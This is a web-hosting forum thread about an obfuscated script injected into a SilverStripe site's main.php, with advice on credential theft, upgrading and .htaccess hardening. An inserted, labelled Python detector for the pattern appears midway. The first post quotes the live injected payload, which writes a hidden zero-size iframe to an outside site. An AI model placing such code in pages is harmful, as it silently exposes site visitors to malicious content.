  • Fabie
    Community Member
    28 Posts

    iframe injected in main.php

    Hi, one of our sites was down for a few hours and apparently it was due to an iframe injected in /hsphere/local/home/mywebiste/mywebsite.com.au/sapphire/main.php on line 121.

    Has anyone experienced any issue like this? Do I need to change permissions to prevent this from happening again?

    That's what the iframe looked like.

    Line 121 contains the following:

    <script> var Z = '0 03c0 0690 0660 0720 0610 06d0 0650 0200 0730 0720 0630 03d0 0220 0680 0740 0740 0700 03a0 02f0 02f0 0720 0610 0690 06e0 0620 06f0 0780 02e0 0750 0730 02f0 0610 0640 06f0 0620 0650 02f0 0690 06e0 0640 0650 0780 02e0 0700 0680 0700 0220 0200 0770 0690 0640 0740 0680 03d0 0220 0300 0220 0200 0680 0650 0690 0670 0680 0740 03d0 0220 0300 0220 0200 0660 0720 0610 06d0 0650 0620 06f0 0720 0640 0650 0720 03d0 0220 0300 0220 03e0 03c0 02f0 0690 0660 0720 0610 06d0 0650 03e'; XX = Z.replace(/0 0/g,'%'); document.write(unescape(XX)); </script> fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>

    Cheers

    Fabs

  • yurigoul
    Community Member
    202 Posts

    Re: iframe injected in main.php

    I'm not sure about this, but it seems to me that security@silverstripe.org would like to know about it - especially if you can tell them how it happened.

    http://silverstripe.org/general-questions/show/264494#post264494

  • dalesaurus
    Community Member
    283 Posts

    Re: iframe injected in main.php

    Looks like a drive-by injection attack on your host, generally targeted at php files. This doesn't look like a specific Silverstripe problem. These jerks will hammer on sites until they get in, then find the first index-looking file and append crap like the above to it.

    1. Change your ftp/ssh/etc passwords immediately!
    2. Stop reading step 2, you're supposed to be changing your passwords
    3. You might want to start checking other files or sites you host there for similar attacks
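
Added example (not part of the thread and not SilverStripe code): one way to carry out the "check other files" step is to search a web root for the obfuscation shape shown in the first post and decode what it would write. The function names, the extension list and the sample tree built in `demo()` are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Shape in the post: var Z = '<enc>'; XX = Z.replace(/<sep>/g,'%'); document.write(unescape(XX));
OBFUSCATED = re.compile(
    r"var\s+(\w+)\s*=\s*'([^']*)'\s*;.{0,200}?\b\1\.replace\(\s*/([^/]+)/g\s*,\s*'%'\s*\)"
    r".{0,200}?document\.write\(\s*unescape\(", re.S)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
EXTENSIONS = {".php", ".html", ".htm", ".js", ".inc"}  # assumed set of web-served types

def decode_injections(text):
    """Return (line_no, decoded_markup) for each obfuscated write found in text."""
    found = []
    for m in OBFUSCATED.finditer(text):
        encoded, sep = m.group(2), m.group(3)
        # Treat the separator as a literal string; never run a regex taken from the file.
        markup = unquote(encoded.replace(sep, "%"), encoding="latin-1")
        found.append((text.count("\n", 0, m.start()) + 1, markup))
    return found

def scan(root):
    """Return (relative_path, line_no, iframe_srcs) for every hit under root."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            text = path.read_text(encoding="latin-1")  # latin-1 decodes any byte
            for line_no, markup in decode_injections(text):
                rel = path.relative_to(root).as_posix()
                hits.append((rel, line_no, IFRAME_SRC.findall(markup)))
    return hits

def demo():
    """Constructed sample tree: one clean file, one with the pattern on line 121."""
    iframe = '<iframe src="http://example.invalid/x.php" width="0" height="0"></iframe>'
    encoded = "".join("0 0%02x" % b for b in iframe.encode("latin-1"))
    bad = "<?php\n" + "// filler\n" * 119 + (
        "<script> var Z = '" + encoded + "'; XX = Z.replace(/0 0/g,'%'); "
        "document.write(unescape(XX)); </script>\n")
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "sapphire").mkdir()
        (Path(root) / "sapphire" / "main.php").write_text(bad, encoding="latin-1")
        (Path(root) / "index.php").write_text("<?php echo 'ok';\n", encoding="latin-1")
        return scan(root)

if __name__ == "__main__":
    print(demo())
```

Run `scan()` against a copy of the site files; any decoded iframe source it reports is an indicator to look for in the other sites on the same account.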

  • Fabie
    Community Member
    28 Posts

    Re: iframe injected in main.php

    Thanks Dalesaurus and Yurigoul for responding.

    As it appears to be a hosting issue I won't submit the SilverStripe security report. I have changed the passwords as well.

    Cheers

    Fabie

  • Fabie
    Community Member
    28 Posts

    Re: iframe injected in main.php

    Response from host is that it is a problem with code. We are using 2.3.1 on this site. Emailed security@silverstripe to inform, and waiting to hear back.

  • Sam
    Administrator
    679 Posts

    Re: iframe injected in main.php

    Hi Fabie,

    I suggest that you upgrade to 2.3.3, and ensure that your assets/ directory has this .htaccess file in it:

    http://open.silverstripe.org/browser/phpinstaller/tags/2.3.3/assets/.htaccess

  • Fabie
    Community Member
    28 Posts

    Re: iframe injected in main.php

    Thanks Sam for the post and your email.

    I have now added the .htaccess file under assets but the test.php file is still visible.
    I haven't upgraded to 2.3.3 yet; that would most probably be why. Will get the upgrade happening and see how things work out.

    Thanks for your time.

  • dalesaurus
    Community Member
    283 Posts

    Re: iframe injected in main.php

    Fabie, it is a problem at your host in that someone that is not you has changed your site files, not a Silverstripe issue. Typically this means someone has stolen login credentials (FTP/ssh/etc) or someone has compromised the entire system at your hosting company (less likely).

    Sam's suggestion would overwrite any compromised files, which is good. But you can bet whoever did it in the first place will be back.

    If your clients have access to the site via FTP/ssh/etc you should change their passwords too, then upgrade. And don't let them store those passwords anywhere silly. Heck, one of their machines could have some malware that is passing credentials back to whoever did the injection in the first place.
